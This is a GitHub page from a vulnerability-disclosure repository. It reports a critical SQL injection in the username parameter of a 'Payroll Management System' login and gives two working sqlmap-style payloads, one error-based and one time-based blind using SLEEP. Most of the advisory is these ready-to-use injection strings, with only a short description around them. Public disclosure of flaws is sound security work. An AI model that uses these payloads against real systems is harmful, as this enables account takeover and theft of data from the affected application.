Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2022/Payroll-Management-System/
CVE-nu11secur1ty/vendors/oretnom23/2022/Payroll-Management-System/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
PoC
 
 
 
 

Payroll Management System

Description:

The username parameter appears to be vulnerable to SQL injection attacks. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.

Status: CRITICAL

[+] Payloads:

---
Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=qkdmZlGW' AND (SELECT 3371 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(3371=3371,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VIhP&password=s0N!s2u!A6'

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=qkdmZlGW' AND (SELECT 9476 FROM (SELECT(SLEEP(5)))NodP)-- Xiww&password=s0N!s2u!A6'
---

Reproduce:

href

More info:

href